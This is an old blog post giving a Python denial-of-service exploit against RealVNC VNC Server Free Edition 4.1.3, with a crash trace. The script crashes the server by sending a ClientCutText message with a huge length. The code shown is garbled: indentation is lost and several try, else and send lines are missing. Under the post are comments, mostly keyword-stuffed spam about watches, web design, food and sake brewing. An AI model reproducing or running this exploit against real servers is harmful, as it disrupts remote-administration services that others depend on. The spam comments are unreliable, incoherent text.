This site is soon to be deprecated by

Sunday, May 2, 2010

RealVNC VNC Server Free Edition 4.1.3 Denial Of Service

Sending a ClientCutText Message with a length of 0xFFFFFFFF crashes the server with the exception shown below. Note: while the vulnerability is present regardless of authentication, for the sake of simplicity this script only works on servers configured to run with no authentication.

winvnc4.exe: The instruction at 0x425BE4 referenced memory at 0xFFFFFF00. The memory could not be written (0x00425BE4 -> FFFFFF00)

import sys, struct, socket
host ='localhost'
port = 5900

def crash_vnc_server():
while 1:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))

print 'Connected'

b = s.recv(8192)
print 'ProtocolVersion Received'

print 'ProtocolVersion Sent'

b = s.recv(8192)
print 'Security Received'

print 'Security Sent'

b = s.recv(8192)
print 'SecurityResult Received'

if (len(b) == 4 and
b[0] == chr(0) and
b[1] == chr(0) and
b[2] == chr(0) and
b[3] == chr(0)):
print 'SecurityResult OK'
print 'SecurityResult Failed.\n\nThe server must be set '\
'to No Authentication for this to work, otherwise '\
'you \'ll need to write the necessary client side '\
'authentication code yourself.'

print 'ClientInit Sent'

b = s.recv(8192)
print 'ServerInit Received'

text_len = 0xFFFFFF
text_str = struct.pack('L', text_len) + '\xAA' * text_len

while 1:
s.send('\x06\x00\x00\x00' + text_str)

print 'ClientCutText Sent'

except Exception:
print 'Connection closed'

except Exception:
print 'Couldn\'t connect'



  1. RealVNC (Virtual Network Computing) allows users to access remote computers for administration purposes.

    RealVNC is prone to a remote denial-of-service vulnerability. Specifically the issue occurs when a 'ClientCutText' message with length 0xFFFFFFFF is sent to the server.

    Jadakiss mixtapes

  2. The key of a successful website is that the owner looks for a best linking expert. The Zoekmachine Optimalisatie services are popular and will help you to get good results.

    website design templatesecommerce web design

  3. You will also experience more regular and easier bowel movements, less straining and bloating, better absorption of nutrients from your food and dietary supplements and a far stronger immune system as 80% of this resides in your gut.

    Driving games online
    custom mousepad

  4. Secure Bytes human asset is its biggest strength. We believe in nurturing and promoting information security. Our team members have decades of experience and highest security certifications specifically in the Information Security Industry which helps us in keeping pace with our clients' requirements and continuously changing Information Security Industry demands.

    it security
    increase youtube views

  5. With a pizza tray or a large baking sheet.Preheat the oven to 450°F, a gas grill to indirect, medium heat (about 450°F), or build an indirect, medium- heat coal bed around the perimeter of a charcoal grill.

    charm jewelers
    replica breitling watches

  6. Sake is produced by the multiple parallel fermentation of rice. The rice is first polished to remove the protein and oils from the exterior of the rice grains, leaving behind starch. Thorough milling leads to fewer congeners and generally a more desirable product.
    Newly polished rice is allowed to "rest" until it has absorbed enough moisture from the air so that it will not crack when immersed in water. After this resting period, the rice is washed clean of the rice powder produced during milling and then steeped in water. The length of time depends on the degree to which the rice was polished, ranging from several hours or even overnight for an ordinary milling to just minutes for highly polished rice.
    After soaking, the rice is steamed on a conveyor belt. The degree of cooking must be carefully controlled; overcooked rice will ferment too quickly for flavors to develop well and undercooked rice will only ferment on the outside. The steamed rice is then cooled and divided into portions for different uses.
    rainwater harvestingSales Recruitment

  7. Bidding web based might sound very simple to use even so the real method it again much less easy as it appears. Putting in a bid in any Penny Marketplace web-site requires proficiency together with experience. Just before you start a bid it’s fundamental to grasp the actual market price of the supplement alat perkakas tas branded

  8. simply argument classes who talk about loose change. There’s lots of for these and then the individuals there are unquestionably positive of numismatics, or perhaps the investigation and range of types of currency exchange. Just one community for example, a coincommunity community forum, is really an abundant tas import tas hermes terbaru

  9. Very insightful and interesting article. I would love to know more about this so
    posting more would be appreciated.